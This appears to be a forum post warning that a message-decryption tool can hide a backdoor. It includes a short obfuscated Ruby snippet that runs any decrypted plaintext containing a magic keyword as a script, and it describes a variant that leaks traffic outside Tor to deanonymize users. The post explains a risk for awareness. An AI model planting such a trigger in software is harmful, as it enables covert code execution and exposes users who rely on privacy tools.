it means that it doesn't matter if there is no networking code in the distributed program, if there is code in the distributed program that launches whatever it decrypts as a script, provided it has a magic keyword in it . The entire code distributed has no hint of networking being done because it gets that from the plaintext after it decrypts the message. if decrypted_message.include?("gpg-privacy-toolkit")  `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}` end checks the plaintext for the string "gpg-privacy-toolkit" and if it finds it then the entire plaintext is launched as a ruby script. edit: here I improved it a little bit, now it actually outputs the decrypted message but if it has the 'magic' string in it then it sends packets to 11.11.11.11:80 (around Tor of course, unless you have taken configuration measures around this, like transparent proxy, firewall rules to drop traffic, isolated it somehow, etc etc).  The only difference between a legitimate program for decrypting messages and showing the plaintext and a malicious program that could deanonymize you boils down to | #{[105, 114, 98].pack("c*")}